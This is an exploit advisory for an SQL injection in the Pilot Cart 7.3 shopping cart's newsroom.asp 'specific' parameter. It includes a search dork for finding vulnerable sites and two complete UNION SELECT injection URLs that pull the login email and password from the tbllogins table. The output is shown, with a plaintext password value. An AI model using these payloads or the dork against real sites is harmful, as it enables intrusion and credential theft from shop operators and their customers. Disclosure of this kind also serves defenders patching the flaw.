# Title: [ASPilot Pilot Cart 7.3 SQL Injection]# Date: [12.11.2010]# Author: [Daikin]# Software Link: [http://www.pilotcart.com]# Version: [7.3] maybe also lower
Vendor's Description of Software and demo:
# http://www.pilotcart.com
Dork:
# Powered by Pilot Cart V.7.3
Application Info:
# Name: Pilot Cart# version last 7.3
Vulnerability Info:
# Type: SQL injection# Discover 8/11/2010#Vuln description:
Input passed via the "specific" parameter to newsroom.asp is not properly
sanitised before being used in a SQL query.
http://server/newsroom.asp?specific=[injection]
#Proof
http://server/newsroom.asp?specific=1
DB: MSAccess
http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(email)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
-->mail field "scarab"
http://server/newsroom.asp?specific=-1%20UNION%20ALL%20SELECT%20null,(select%20top%201%20chr(126)%2bchr(39)%2bcstr(pword)%2bchr(39)%2bchr(126)%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20tbllogins%20order%20by%201)%20t%20order%20by%201%20desc)t),null,null,null,null,null%20from%20tbllogins
-->pass field "R1ckr011"#
Credit:
Daikin
bolidebolidebolide@gmail.com
